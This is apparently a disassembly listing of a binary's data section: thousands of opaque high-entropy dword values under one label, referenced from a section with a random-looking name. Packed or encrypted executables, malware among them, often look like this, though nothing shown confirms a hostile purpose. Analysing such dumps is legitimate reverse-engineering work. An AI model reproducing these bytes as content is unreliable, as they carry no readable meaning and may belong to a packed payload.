		dd 268ADE7Dh, 69BB98CEh, 72C3A3EEh, 0DF7C235Fh,	497AEEA5h
		dd 0B505B012h, 0B318FD22h, 5ABF733Eh, 0AF23D649h, 9D0724E1h
		dd 4773C7C3h, 3FAE8EC9h, 0B7552953h, 5417512Bh,	217C5296h
		dd 0F9D87C0h, 6878743Eh, 435540F2h, 0D0BA0D0Ah,	4C30A9EBh
		dd 9873789Dh, 78B8FF40h, 57D1CD66h, 72C72670h, 0A8F26197h
		dd 89A72132h, 8A47BAC3h, 0D295792Dh, 0DA6D6218h, 1AAA6B45h
		dd 3DACF5Ch, 591A2ED7h,	7C95BFECh, 8DF415F9h, 8ED07C40h
		dd 1246AE1Fh, 3E8A4595h, 0D9E2C1F1h, 74C6314Ch,	0AF216171h
		dd 98D8481Bh, 0CEF664ACh, 0D687D1ABh, 9EAEC11Dh, 86850E56h
		dd 3AFD7DF5h, 1C0F8BE1h, 73DFF510h, 796C2675h, 6C464E15h
		dd 7CFAA5DDh, 1A325162h, 9D5AEBE1h, 5F23FF1Fh, 0E6387B0h
		dd 63E37B39h, 3993B0FCh, 9E5912B6h, 34D3DBE5h, 8EC7DD24h
		dd 535494E1h, 0E575E2A1h, 143E73E1h, 78FD356h, 0C76E2E8Eh
		dd 810F79EDh, 0B54C0ACDh, 2DABC067h, 925EA431h,	65BD1107h
		dd 0B90A884Bh, 796B50CAh, 80C989B3h, 6AFFC281h,	0A3EC6E67h
		dd 0D6E9438Ch, 973B0EC4h, 11E6AA95h, 0DF007F8Ch, 0B7AA8507h
		dd 3298884Ah, 95EE0FAh,	946C7BA6h, 1495C251h, 151937Fh
		dd 8D07A907h, 0F977726Ah, 355B03CDh, 384765D2h,	31664B4h
		dd 0DF997C42h, 0A1C10D23h, 9D96F185h, 0ACEEF544h, 0B6E210E2h
		dd 3A57D035h, 45D104DAh, 0E1B06D6Ah, 0C911280Ah, 1BC87195h
		dd 6B0519D7h, 0FDC322DBh, 6FBDD508h, 0E3FDE9F3h, 0AA89A3B2h
		dd 0B7F77DA7h, 27BD97CEh, 0BCD97E73h, 0AE14DD08h, 0E24CEE22h
		dd 36166080h, 6B66D986h, 0CD27427h, 0AB7E540Bh,	0C770F9E8h
		dd 0F13679F0h, 63BD8FB3h, 0CA838E8Dh, 329C3454h, 3097BB02h
		dd 5253035Ah, 30E806C1h, 0AFF56762h, 8AC34EC7h,	0D2BD8D0Ah
		dd 977FE258h, 0A6ABE288h
		dd 0CF577E16h, 48B949E7h, 0B5058F65h, 446F6B72h, 4359FDBDh
		dd 0F8CCF8A4h, 3E9DD462h, 4CCE095Ch, 0DF99FA98h, 0DB88B146h
		dd 8DAD02Bh, 0E1846703h, 95635545h, 2FD906BFh, 1B928FA9h
		dd 98B9E87Eh, 4562A910h, 5758BADEh, 0A0F32F5Ah,	0EB579BD9h
		dd 3A85412Bh, 67B7A67Ch, 52B5A377h, 0F7182A32h,	4AF25350h
		dd 0DBA755CAh, 8E25499Fh, 0AE2645DDh, 0F7BEBD0Bh, 0DBA9B1B9h
		dd 70BCB608h, 0B97FCAABh, 0C87F4AFFh, 3C316D8Dh, 719535F6h
		dd 63A5554Dh, 0AA954016h, 0F03527FFh, 79EEA31Dh, 0B48EE2C0h
		dd 5CEE976Fh, 98503C1h,	58A28295h, 550D0979h, 0C5C7966h
		dd 0F7B464B9h, 3F631A37h, 9635707Eh, 0AEB98A65h, 0E08F8CD0h
		dd 0D94B5F43h, 1F5F43DDh, 0C8DDAE98h, 6B112B1Fh, 8819F07Ch
		dd 0CBB25423h, 650A94D9h, 0A38D289Ch, 0CD2AABF6h, 30744B16h
		dd 0BF018BBEh, 0CF9B9F7h, 0B5C991EAh, 702DDAD5h, 0DFAF2D3h
		dd 64991B2Ah, 9F71D6BCh, 0B251E395h, 8A527F35h,	0B961B27Fh
		dd 165512D5h, 374DDDB5h, 97029551h, 46A21DBDh, 3E78D596h
		dd 78D0D530h, 9DC2F4A6h, 9995F9EFh, 53B308E2h, 58493E7Bh
		dd 860FA462h, 0DA385319h, 1CCEB50Eh, 0C661CB19h, 0E0884A48h
		dd 0D85E0987h, 0B39AABADh, 820FAC53h, 3FD97E66h, 2AAF8EF3h
		dd 7FA90514h, 0F725A0E3h, 0BB49225h, 5CDB231Bh,	69185562h
		dd 0A924829Dh, 9642C0F2h, 964FFF12h, 9844EADh, 775EF913h
		dd 3BBAD641h, 0A5C0ED5Ah, 0FD3152CCh, 7CF72BB3h, 9E32EE5Eh
		dd 0E1197578h, 44916A9Ah, 8FBCFAB6h, 27AECFDCh,	0BB4EC541h
		dd 0EE24AEE6h, 6E90292Eh, 7089A8B3h, 70491BC3h,	0A38AA3D5h
		dd 0E3712FB8h, 6F7356F7h, 317F81F8h, 35D8DEFBh,	0FF5DCCB6h
		dd 6E4B938h, 16FD5545h,	75E86C67h, 91AFBABBh, 90D74AE9h
		dd 16FD43F1h, 4C1280C3h, 0DDF4B250h, 4209EE9Eh,	37E34691h
		dd 0F33B7DDDh, 6F91AF2Ah, 39BD75F7h, 460603E5h,	9A83DE4Bh
		dd 84AB1ADh, 1BFA0CCAh,	0F05FEE26h, 0A749978Eh,	6F68187h
		dd 0B97AA06Ah, 784BD8FFh, 67C35DB1h, 216A4567h,	81F48CD6h
		dd 783F1E89h, 15A3782Bh, 494A983Ah, 0B7F849B7h,	0C23AED6Ah
		dd 15A57A18h, 0A0C89AD8h, 0F0AF8B52h, 433DB18Eh, 92AAF6FAh
		dd 0E3075FDCh, 0C71631C7h, 0E43F3691h, 0B9AC4F6Eh, 7EF21FDEh
		dd 0EFEC4007h, 0BAA10A39h, 0EFCBF3D0h, 46D0CC95h, 0A6552206h
		dd 185E6513h, 76EE5FC7h, 67D841A9h, 3A361F8Dh, 957B5841h
		dd 4655CB77h, 0E985BBA2h, 58E2E33Eh, 0B398A6AEh, 0D6EA38DEh
		dd 56AC9952h, 1C637FAEh, 0E19C3BEAh, 5F4343A7h,	852F13E5h
		dd 4A8083CDh, 0F5B634B8h, 0D1B97303h, 92527AAAh, 5B889BF0h
		dd 65B06397h, 677826C6h, 0A846FC47h, 0BFB438FDh, 69EA2F9Ch
		dd 4732874Ch, 1209DD07h, 0E41F6CA1h, 0AEFBD0B1h, 0E048C0DCh
		dd 51A3607Dh, 25CDD4CBh, 785755B6h, 2E33D7E5h, 49B76A4Eh
		dd 6B3AF7E1h, 559BB527h, 349788F9h, 75F8D4B5h, 0A06F11A4h
		dd 0A3396845h, 9CC5AA07h, 196D257Eh, 0AA1F7351h, 415C4CBDh
		dd 637283AEh, 70380C5h,	7EA9EF74h, 0FD2BD989h, 0AAB00CADh
		dd 193864BCh, 778E2345h, 78B708EBh, 41E6C39Dh, 768FB745h
		dd 180055Dh, 0EB43C87Eh, 0B7DE8275h, 0A9AED067h, 0D066E1CCh
		dd 55696400h, 7B556632h, 2F1EBDB7h, 8A1ECF85h, 0BC924C09h
		dd 43F12D8h, 0D72C551Dh, 1FA70DCCh, 0A75FC59Eh,	4C9EB8CAh
		dd 8BE3477Ch, 0BAED1FEEh, 4F94F0A4h, 0F5206896h, 0FCD87F52h
		dd 0E15BFBF1h, 8EA8BEDBh, 6DE24BB6h, 4BFB8ADFh,	0CCC1FC8Dh
		dd 1129594Dh, 0FCA27DF8h, 5FA97D1h, 3B1C8D25h, 0CACC3F2Ch
		dd 5F9F3A55h, 0CB350BAAh, 0C5FB0583h, 6CB80061h, 0F165E160h
		dd 0DE59B7F7h, 5997EE1h, 3189E96Dh, 0CD49D568h,	440775F0h
		dd 0E8ADD52Bh, 1A62B571h, 77BFBF9Ch, 5189EF44h,	0F75CC185h
		dd 5673A654h, 5F571791h, 0E991D6B4h, 8F3BFEB2h,	2FB3F004h
		dd 9D29E17Eh, 0F7A99B19h, 8A77C25h, 1E86BFB7h, 78300B35h
		dd 55815E59h, 9893B9F2h, 0CB624492h, 2A465F12h,	0A53D9FF1h
		dd 6A8A3C89h, 81DB7678h, 92E6BFDAh, 0D6CB64D4h,	0D19C1FA7h
		dd 62D83994h, 41F652E3h, 0AEBF2C95h, 0D3CA14D2h, 9D878345h
		dd 0F3302EBCh, 87182710h, 0DEED6F81h, 41D8613h,	0BBEB75D5h
		dd 6DE52D1Fh, 0FA38773h, 817F7D9Ch, 34B95D82h, 0BF0BF2h
		dd 0DA7D2D0Dh, 18A700E7h, 0F49F78B4h, 81AC2AB4h, 9E2380BAh
		dd 0C61D2C44h, 3134298Bh, 4A008CDCh, 97B744EDh,	0D79DA970h
		dd 0C0D9E792h, 37CD368Ch, 2355532h, 19333665h, 69DCAAF5h
		dd 5A07C316h, 0CF53DC65h, 8A03B0DAh, 0C9213F17h, 7E4A17EAh
		dd 8A9D6BE0h, 2A5E2E56h, 765AD2C7h, 99F87ECAh, 32AFCCC9h
		dd 7EBDDDCBh, 0A44F8965h, 988D61EEh, 0A602F9B5h, 68BF3595h
		dd 82D09674h, 4236BE37h, 1C3AD54Dh, 0A53255D3h,	96490C74h
		dd 0A48F4A3Bh, 0E8DAE32Ah, 89CFB52Bh, 0AA083893h, 0B1423716h
		dd 5CE2A9FEh, 95561F5Bh, 7DD1DBB5h, 10FFDE70h, 0AEA15B46h
		dd 63D51FE6h, 8A667473h, 351755F4h, 18EA736Eh, 0C626FE47h
		dd 96F4A04h, 9B6AB32h, 0A42ED758h, 4397907Eh, 0C9AA8AF1h
		dd 5D03D21Ch, 0A091CD69h, 2EAB6940h, 0BADB4EF4h, 0D5771AC9h
		dd 0B2D8CCF8h, 0DCC38FBEh, 0D2CE11A3h, 0F6C1983Eh, 2E6989C1h
		dd 0D2FE703Dh, 0B3BF33B7h, 0AE4EE9E6h, 0F90F47CEh, 54A1F622h
		dd 46A7C65Eh, 83248DBh,	0B5D73E26h, 0CCCC8883h,	0B68B13F7h
		dd 7ECDBBB9h, 0DB3AC2B5h, 0A7773284h, 9FBAC32Bh, 1AEFFA8Dh
		dd 52D0D42Dh, 4A515FC3h, 93457633h, 7CCCE2F5h, 2138FC15h
		dd 0EDE40B62h, 0F555FBFCh, 0ABD346E4h, 146A5C09h, 0D6927DB7h
		dd 0DAF3B91Bh, 73A70F15h, 5C26C471h, 767BB51h, 0F696B1A0h
		dd 0AA56BA5Bh, 0EC1021C0h, 4D52FEAAh, 0E191F72Eh, 0C339B46Fh
		dd 0CDEB0BE3h, 0BC37ABCEh, 4F96E842h, 0EB5CD62Eh, 0C575AB8Fh
		dd 3B20A66Dh, 0CF5FE951h, 4543DFEh, 0EC4AD776h,	0A8DA05DCh
		dd 0B35047D8h, 93132B7Bh, 4595359Bh, 0A975DFF9h, 0FF235083h
		dd 45F65A32h, 0A2317649h, 0FB7BE6DCh, 0FB46E686h, 9C4E2755h
		dd 0C0C8CB3h, 0C4CB70CEh, 0A74EBFE2h, 34B7B8CBh, 24E5128Ch
		dd 0F9B918FBh, 0C7DB8E3Ch, 0DAA5B313h, 0C5D7FDAEh, 92C0B9A7h
		dd 1DEEC1A0h, 0B254E17Ch, 8F11DA75h, 7725862Ch,	6AB49879h
		dd 0D57AE6AEh, 0D257BFF2h, 1E3B8299h, 0F09B719Ch, 0CBDC9855h
		dd 8CBDE260h, 2C2860BBh, 5C5934A0h, 4B7D5DCCh, 9BFE7589h
		dd 8CC31C87h, 0AA10AD55h, 4B359094h, 0B8E73DEDh, 3C0B5FAAh
		dd 0CB94D59Ch, 0C895EFC1h, 16C5FC34h, 85F6FDC3h, 553600F1h
		dd 0E72B0BD9h, 45F7F514h, 0E3B92BAAh, 2BEDFB37h, 0B9FC0EC4h
		dd 3C967C8Eh, 3EFE9CAEh, 50B7E277h, 0A4D7D3CAh,	0F5DA6CECh
		dd 0F0D59DDBh, 0D705282Bh, 6717FADh, 3B08D53Eh,	7FB66C34h
		dd 7E0A804Fh, 787A5E28h, 2EF2D9F9h, 0F82D30DAh,	66FE56FBh
		dd 97BEF6F8h, 75613C58h, 303CB103h, 9AF425Fh, 3E67FF49h
		dd 9B3E68E4h, 3C549959h, 86C9DA2h, 0B4AE389Fh, 5F358D9Eh
		dd 92CFB2A4h, 39E5682Ah, 0B5067FBFh, 313CC621h,	48DED97Bh
		dd 7C5D268Fh, 0BD246347h, 1A547877h, 0B915AD70h, 734B8E92h
		dd 0BA8FD68Dh, 3D59ADF3h, 79D6865Ch, 7F380F23h,	0DBB7C952h
		dd 0BD1F7544h, 0F19B1758h, 21683CE5h, 57F94E82h, 0B6B38A29h
		dd 9D32BECh, 60B0D545h,	571DF657h, 6EA93F17h, 2EBCB953h
		dd 2FEC3640h, 0FF236A73h
		dd 0F891DCCAh, 0A674049Dh, 0DBCB9CBh, 0AFA94BEAh, 2A0E9682h
		dd 587F7B25h, 302E874Ah, 3489200Ch, 3116B3AEh, 8B9CF9A2h
		dd 0CF2DD46Ch, 0A249F51Ah, 0DEA70232h, 8C6B2990h, 40427CFFh
		dd 2BA13185h, 0B5EE3A7Dh, 2193B7F4h, 2E5E7289h,	4A736DF9h
		dd 0CF16A52Fh, 96DA0FC6h, 0C0FA5285h, 29CB5543h, 476AE97Fh
		dd 128CF31Dh, 80C8073Ch, 97555692h, 4FDF4109h, 0B704AFADh
		dd 0E70E3EDEh, 37569D5Ah, 0A07E9E13h, 5C0FB457h, 91F20A49h
		dd 0B9233A23h, 0CCDB69D4h, 517E073Dh, 3745968Ah, 0A2573532h
		dd 362CAEB4h, 0FF988E45h, 94DDD3B4h, 84BC9D9h, 0E1EEBB13h
		dd 211D930Ah, 0E1781769h, 0CAD3D380h, 208C877Eh, 6E941977h
		dd 2ACFDB13h, 470581D4h, 26D58CA1h, 719C22F6h, 0EBC32DE5h
		dd 0E3D883DFh, 0E055DBEAh, 9FB525Ch, 0B445425Fh, 0BBD58D25h
		dd 0CB92A292h, 52826F03h, 7DDF7E22h, 55B8FF3Eh,	8CFFB129h
		dd 35BAE210h, 0D3ECE35h, 0D1DB4A75h, 6E855FC5h,	0EA82BFBDh
		dd 0D4E26B03h, 0BD766BF0h, 2FF2FE29h, 6B344F8Ch, 847785C7h
		dd 0A77037E0h, 0D26EE73h, 0FFB25755h, 0DAEF0159h, 6A3D19Fh
		dd 0E95FA1ADh, 0FE2C4F27h, 882BA044h, 9623CBD5h, 2CAF24C4h
		dd 0E70A827Eh, 0D7EFB7CCh, 96C46501h, 919559DAh, 4C30ABF4h
		dd 9495C267h, 15648973h, 789192F0h, 0C3727CE9h,	1E1BBCFDh
		dd 14882577h, 23B3A10Eh, 454DD3EAh, 0DBA63D67h,	3F37C1B2h
		dd 0D3F43642h, 466C7E19h, 0BE0731Ch, 0F26BDF99h, 76DE9F86h
		dd 0E2D02E40h, 0AC2635F7h, 9775B78Fh, 0E8C284A1h, 0F5A86340h
		dd 845EF61Dh, 0CBDA6224h, 0F658F714h, 0C8653B7Ah, 0C6A49BAFh
		dd 0FA382CC7h, 0CE5C264Bh, 41E65CC9h, 7F650C0Bh, 48409B16h
		dd 0A04CD476h, 12B5D831h, 0CA97B5FFh, 0B89F1B47h, 47041FB7h
		dd 7955939Fh, 9BE9B53Fh, 4E04D6E6h, 74B39689h, 755EDE20h
		dd 64703BA6h, 0CAAE3C67h, 9A29B371h, 0F5CAF3CCh, 0D6F215A2h
		dd 0E9D794F8h, 0A4936AE6h, 9FE10C91h, 0B83199ECh, 1C295948h
		dd 23C96C6Ah, 6E9E5E4Fh, 0C38D51DFh, 5CBC9383h,	18B8B126h
		dd 0D1E7B703h, 0CFE453BAh, 0A83C5D2Ah, 0EBCF5291h, 0A446F9D3h
		dd 0DBAA54D9h, 318285ABh, 64CD1755h, 4B460B6Dh,	5D8AB053h
		dd 3798E731h, 0C2F5E079h, 0DE77FD2Bh, 0E6A3974Fh, 0CC094ECFh
		dd 4664C124h, 0EB508331h, 0A1857DA8h, 8DD7553Bh, 2729E081h
		dd 95E68AFh, 0C4E1B6E0h, 0B3863F70h, 98C40B2Dh,	0AC5EA555h
		dd 0EDD790Eh, 65F6129h,	1B6A5F12h, 62F9DA49h, 29B0B71Dh
		dd 9287DC3Ch, 9220DB2Fh, 0F02EE3FCh, 2E41A4FBh,	0A43233ECh
		dd 0A7A1C5D2h, 52E40766h, 0E5E53539h, 3C42B8D6h, 773F3B0h
		dd 9DAB9F75h, 20F90DF9h, 36E396D1h, 38070CEFh, 0C7A31EE3h
		dd 23120EFCh, 33757577h, 0F02B7D96h, 5D830AA3h,	0A28A2ADBh
		dd 0EB7DE0F9h, 1134FE0Fh, 5D2CF907h, 714D3CF3h
dword_484560	dd 0AD1F0F36h, 0CFFCB5D6h, 78273EBCh, 5BDEA21Ah, 4F3C3325h
					; DATA XREF: _1fieagrn:off_41E854o
		dd 7A5B9E13h, 0F5DAAA3Bh, 6CF74B30h, 0FC931818h, 3D3FB445h
		dd 0EF2A5AB3h, 0C7BDE28Ch, 0F5D64D36h, 0CC5211FEh, 0CF8012EAh
		dd 76E558F1h, 0FFC901A4h, 0D0B270CAh, 6D5275AAh, 0B0A86849h
		dd 967892ABh, 64FA8CA5h, 818CC12h, 0CC6C902Dh, 99A2535Ah
		dd 4A04174Fh, 6F6D2AECh, 775954BBh, 0BCF8908h, 395460B9h
		dd 822E80B2h, 6ABD5DBCh, 817C401h, 0B1D550ACh, 0AAE1A8EAh
		dd 0A0612CE0h, 3B99708Eh, 3925A3Fh, 95CE01A7h, 779685FEh
		dd 62EC01E3h, 2C8F2709h, 77C9D0C4h, 2E127E84h, 0B45AE25Fh
		dd 0C8CAB79h, 0B7C7FBD1h, 0D1483F15h, 26EFB1D4h, 58AD4B32h
		dd 0ECF9138Ch, 0C48B2A5Dh, 5750C701h, 8826D274h, 745D6AFBh
		dd 0BCBA5A1Dh, 8FB449BDh, 2972A661h, 75B681FFh,	4C930F47h
		dd 7F1A514Dh, 0C676B156h, 3D0A4D36h, 7AFF3DF6h,	7ECF416Ah
		dd 0D6AD298Dh, 0F4143F1h, 889FABE0h, 54957130h,	0F2B1E59Ah
		dd 0D4730926h, 25C344E6h, 0BED6968Fh, 1926A6FDh, 65699F6Bh
		dd 7A336DDBh, 0B34D271Dh, 21086E06h, 0AED47D45h, 5D147039h
		dd 57035365h, 0F27AB236h, 0B0A5CBF6h, 0BE079501h, 8DC5D4B0h
		dd 472852BFh, 5AEB5DC3h, 0FAC734C7h, 0FFD46F4Fh, 7C2F5097h
		dd 9379B519h, 0D9620A8Ah, 0C3E7FB5Fh, 14A568E7h, 4AFBE162h
		dd 0CFE8E3A9h, 1FC72329h, 0A2D543F0h, 0E1CA0F83h, 4B6F259Ah
		dd 0EFDCDA4Ch, 75CC5303h, 5149E3ADh, 0B9BD4AA3h, 0FDB0F24Fh
		dd 1578A2DDh, 69DAFBF4h, 8B3B0BC0h, 45B55E1Bh, 3FBE9AFEh
		dd 90F39832h, 0DF5690E6h, 825B76FFh, 588F165h, 1258D527h
		dd 4268CD83h, 0F84D0B55h, 4B69C2FCh, 607E02B6h,	151E0BE7h
		dd 0E371B9DDh, 0F792CAF5h, 45C74E79h, 76B78FE3h, 116A1EE8h
		dd 0D186F271h, 0D75E5766h, 5A5ABE4h, 6C66094Ch,	515D7052h
		dd 0FD7246D0h, 0A2A8C1F6h, 0C8E71D71h, 2F573476h, 0AB677B45h
		dd 0EFCB7E0Bh, 15CD254Fh, 0B210E1BAh, 8ACE5A97h, 9A506CF5h
		dd 97EAB43h, 7BB3C56h, 1D81D4BFh, 568D3F31h, 2574F36Ah
		dd 0AC052DC2h, 139EAD2Bh, 7D73DDC9h, 5CE50519h,	0D3E919BFh
		dd 0E23AD469h, 514C7687h, 0A6639116h, 0BD17CB16h, 7BF214Dh
		dd 555DF885h, 0C3B710CCh, 9DE31D6Ch, 0D69DD16Eh, 4C8380F5h
		dd 0AE4A5EDDh, 0D18158E4h, 2B5E85A3h, 66DEAE59h, 5C2E58EFh
		dd 8024AD59h, 0E07C93BFh, 0FDF5FD51h, 0EBC4BF9Fh, 0D6B77C77h
		dd 7B18B703h, 1779F3E2h, 1A2FDBF7h, 7555A4AFh, 87B84160h
		dd 0CDADD51Ah, 0AAABD145h, 0AA17AFF8h, 434C1E87h, 6816C256h
		dd 5FD543F8h, 7361FD8Bh, 737335A6h, 1CB203CBh, 4F08BF73h
		dd 0C9C99803h, 0D42AD3AAh, 0F67EB5BDh, 0F7923689h, 632F864Dh
		dd 418BDCFAh, 0E2A5D116h, 2FA7915Dh, 1FED5354h,	5B1387Eh
		dd 0AFB53B1Ah, 64A3F8CCh, 5C79BEAAh, 0F676BBCCh, 42DF9832h
		dd 32EA7DA9h, 0BE1D838Bh, 0EEC09B1Eh, 0CF438EE4h, 2DC8713Eh
		dd 8BBA7DFh, 0E42B5927h, 6CF62F33h, 191FA2B9h, 18D2AD18h
		dd 0A32B9BB9h, 66DC4965h, 0B4DF70BDh, 4176954Ah, 0DCDAF5F0h
		dd 976FFE88h, 4E6D130h,	8EF2F80Ah, 636CFAC9h, 3A11B336h
		dd 8F6D1AEh, 3F505687h,	36C05F89h, 0F43B1F63h, 0AFCB38A8h
		dd 0C1589E27h, 0A257990Fh, 5F82700Ch, 0D1FAEC2Fh, 0D87FFC79h
		dd 307FA299h, 7D7B897Fh, 33BB8F0Ah, 0B349EBC3h,	8C504522h
		dd 0F85FC18Ah, 0FEEDB4F3h, 3E2BE118h, 0DE89AA10h, 2B861D47h
		dd 0C9B14095h, 0A2E5A13Ch, 66317E46h, 1C7708BDh, 3CAADA38h
		dd 0CBF518FEh, 0A88B8160h, 99DA88EDh, 7383D430h, 957FC907h
		dd 0DF6DCFEh, 0C4DF4A7Fh, 0E5345744h, 64325C9Dh, 46935F7Bh
		dd 9E151A6h, 128A9AD2h,	0B14BFEA2h, 0E8B6F600h,	0DFB77278h
		dd 47A2A02Bh, 0B878CAD5h, 0B251EAE2h, 0B1BA1EF4h, 5418D29Bh
		dd 0D03788Eh, 6312FD39h, 0F5CB10DEh, 2142A7AEh,	4AF9D40Ch
		dd 22AADBCCh, 7714B325h, 2DC4CE0Bh, 8E3A70D3h, 0C6715990h
		dd 0E0F8D1B0h, 0A7B69587h, 2083BB65h, 0D7A5BC7Bh, 357FF353h
		dd 7C2229D3h, 1CB878A2h, 7BB06C98h, 0FBCB72FAh,	51B122DCh
		dd 8992E41Eh, 0B03EC05Bh, 0B1684AFBh, 9C780CCFh, 27653386h
		dd 31F41B79h, 28047BF7h, 15F6ECFAh, 6B8BFB19h, 0E1B83D8Eh
		dd 0DF4C8537h, 0D22159F6h, 31A08D6Ah, 0B2C970FAh, 556CDC6Eh
		dd 0C5DDAD4Ah, 0A57D42A8h, 578D5955h, 64193C0Fh, 8E58E387h
		dd 0AC077234h, 7017E9DAh, 2E25258Bh, 0C9CA7C4Dh, 20CEA594h
		dd 6155998Ah, 37150D36h, 0CB32EA5Fh, 1649086Eh,	9137EE81h
		dd 0EFCB2861h, 0FA7BEC82h, 0B50CEFC2h, 8B61B9EEh, 91074B2Ah
		dd 0D5F4F707h, 0C591B462h, 4DC6E56Ch, 69915352h, 6AE6CD55h
		dd 0A3BE4FEFh, 819CA99Fh, 0EA376A4Dh, 37C3C8F8h, 0B9B176A6h
		dd 0A2AF5D79h, 55AD34DFh, 523DB1Eh, 3E5919BCh, 0C7297E1Ah
		dd 157A3345h, 0F6BFD907h, 3B055447h, 0E7FC5347h, 0BA700E44h
		dd 6A9DBFC7h, 0AA4B397Dh, 49385D71h, 1E38AF94h,	2DFD373h
		dd 0B6E1C3B2h, 28CBAE7Bh, 0B616BA4h, 0F89E0EA7h, 195A08C6h
		dd 5D3078A5h, 4CD9072Ah, 0EDDEE98Ah, 78712F5Dh,	45A6E870h
		dd 0E36C2C0Bh, 34147793h, 516A3A8Bh, 61525CD7h,	93B14CB6h
		dd 0F9006BACh, 52442BE9h, 0E18AB295h, 777FF54h,	4B9DFA73h
		dd 949240FEh, 88F639EFh, 5D5D81Dh, 0CEB6FEAAh, 50FCCD41h
		dd 0DEFB67ABh, 7F7B063Bh, 8C548EC6h, 44DE2121h,	2EB3736Ch
		dd 21FD92FFh, 0D50AEB92h, 40DD24AAh, 0ADFD3AE5h, 33BF3F02h
		dd 3997D94Ch, 52D1DCC4h, 0A88985A5h, 0D4E1DCF9h, 4849A53Dh
		dd 174EB23h, 0DF8F44FBh, 7AD7409Fh, 252ADDBEh, 0F95F836Bh
		dd 7995C50h, 83C66B5Eh,	340F9C8Fh, 75F2865Ah, 0D15FAA5Ah
		dd 0F7E0A46Fh, 4665F999h, 0E4687CF8h, 70424D5Ah, 0C4D75FF2h
		dd 6240FCFCh, 54A53F2Ah, 90FBAF53h, 129B1359h, 1DDCF1B4h
		dd 47C962DBh, 0E2DC8C8Fh, 6CEFDFEEh, 63ECDE2Bh,	360D91C5h
		dd 9815F57Ch, 0DD69D81Ah, 0C53F470Ah, 5732406Bh, 0E1935AC7h
		dd 2ECEC096h, 0C2AE9496h, 0F60B1986h, 0B470FCF1h, 6F5BE751h
		dd 2D9E1F9h, 0A5F892B1h, 8E09EBFDh, 0DB6839D8h,	5BDB46E2h
		dd 0AFA4DC84h, 0F5D199EBh, 0FF64244Fh, 0D6E1CC22h, 0A6473508h
		dd 663DE9BAh, 0FE265DC5h, 0BBBE29C0h, 0B4395D6Fh, 0DDE99D79h
		dd 0CF23CE23h, 93D56998h, 42F80D00h, 0F5AAF88Bh, 0A20C6065h
		dd 0CBA45D6h, 53C0EA90h, 11DE8A1Dh, 0F852B414h,	718D69EBh
		dd 2AF5F5E6h, 0D11227D0h, 7CB58BFDh, 0FA456C2Bh, 1EA2A5B0h
		dd 75948E0Ch, 1EA7AE27h, 0C96BAAB0h, 0A223F7EBh, 0D689D62Ah
		dd 11EB7DFAh, 0B069DBAh, 0C81456F8h, 0E32382ABh, 936D8D36h
		dd 572BDD71h, 69DBE10h,	995F9B13h, 0FE93D659h, 0ED1122BCh
		dd 7C69654h, 147D398Dh,	52F4EDF4h, 56E4485h, 0B80ABBBFh
		dd 0A541E516h, 6B1225D8h, 2EE8F462h, 0A24B965Ah, 0C4CF49E2h
		dd 0DB0429Ch, 0E17C578Eh, 7869F217h, 8E9DB4BAh,	0C85972DAh
		dd 442A8E86h, 3C5880CDh, 0EFAEBF7h, 0B7604236h,	2C031C47h
		dd 6E4102B4h, 0FDEB5F48h, 617CEEh, 3F132BFFh, 0AC3B4DACh
		dd 6C4C2BA0h, 42F71EF6h, 679D3C6Bh, 0C4EF1144h,	49E90BF0h
		dd 0C2C164EFh, 0D02DC1E1h, 5F6A328Bh, 16ADCE53h, 1AF414DFh
		dd 0C6B11292h, 0D627BB78h, 32AE55BEh, 0EED3F898h, 0E7CFCFFCh
		dd 593422Ch, 43684D05h,	0D809897Ch, 0F90D91F3h,	39022D19h
		dd 0F5B93842h, 0A4BFC0F8h
		dd 0C4CA6E36h, 7B51CEDFh, 244BF557h, 39F74A54h,	6F3A3A1Ah
		dd 0AF2CC5C9h, 9CBB88CBh, 0D6FE3C77h, 0C625E182h, 137FBB26h
		dd 7C8CDCF2h, 5B7B9FB4h, 864B7223h, 0E5C60B2Bh,	0B94BCD91h
		dd 7CD0CBBDh, 6EFCC879h, 0A83F5361h, 508747B3h,	2E3519Ch
		dd 0A0AA682Eh, 9602DD74h, 0E25847F5h, 0C66D8D5Dh, 0BBE290E5h
		dd 672A7DFFh, 8A5E84D2h, 4B1B8896h, 8F8205B0h, 0E919A3AEh
		dd 22A370E8h, 10B4987Eh, 8A128663h, 984368E1h, 95C36905h
		dd 0B47CF190h, 0CBCCBCC3h, 6C1461A7h, 0FA63B8E2h, 0AD1DF41Ch
		dd 0CA43B26Dh, 46327658h, 757ABA39h, 9E384B2Ch,	0BF614BBFh
		dd 0EFE5D99Fh, 7B2B97C8h, 0C6C7A7A4h, 0B930A41Eh, 0B8B6943h
		dd 78F62786h, 0C4DB8CE0h, 0AC3BBC9Eh, 0A9AC5016h, 21352771h
		dd 37619074h, 0B3282B47h, 0EFBBD9CEh, 0AB5591F3h, 0E2AD64E5h
		dd 0A5160FC2h, 1748DACh, 0C4391CC8h, 822694A0h,	6C5B39D3h
		dd 0A0F524C4h, 0A38F4943h, 469D2ABDh, 4A3CBD9Ch, 0EA187AF2h
		dd 731FFE16h, 16D7241Dh, 59820D3h, 403653AEh, 9430EBDDh
		dd 0E32FAF18h, 4DABFEFCh, 9E39864Fh, 7B6EB83Eh,	0D31710F5h
		dd 883F889Fh, 0B5F453DEh, 97E50A6Ch, 135B4D79h,	0BA0EFF21h
		dd 0D5289D94h, 0B134C542h, 0D8BB5D49h, 0DA067360h, 17B65776h
		dd 9C3F6F8Bh, 4251CE13h, 5BC3C6CAh, 0FDFAD4E9h,	77CEFC0h
		dd 0CCEF5B4Bh, 6214B99Bh, 720F7DC8h, 128481ADh,	5ECEE35Fh
		dd 9307BDBCh, 9A6E6707h, 0BB9189F3h, 0DBB70BF1h, 0F3EC0683h
		dd 0C3B3AE57h, 6C57CE6Bh, 2B3B7DFEh, 57881E5Bh,	81772D40h
		dd 3170B3EBh, 39A3F930h, 8C09A95Fh, 399BA32Fh, 0CD5033Ch
		dd 0AF2EC235h, 7E1283ADh, 58A9ABD3h, 29B79EF9h,	0F9BE32B0h
		dd 3793094Ch, 0E0A83AA1h, 3D2EB5Ch, 0A8745FCBh,	0BBD99FECh
		dd 0C870259Ah, 35630FC6h, 289EECA1h, 7CB35AF5h,	47DD3E2Eh
		dd 9487C8A3h, 833BFB66h, 0C5506578h, 7943AB33h,	0B6C045E2h
		dd 0BB086293h, 0E1B406DDh, 1637C9A1h, 0B2B6FCE2h, 5B17D7AAh
		dd 0C840C7F8h, 533A4DB7h, 0A6FB72Eh, 192DEB9Eh,	0EAE164E3h
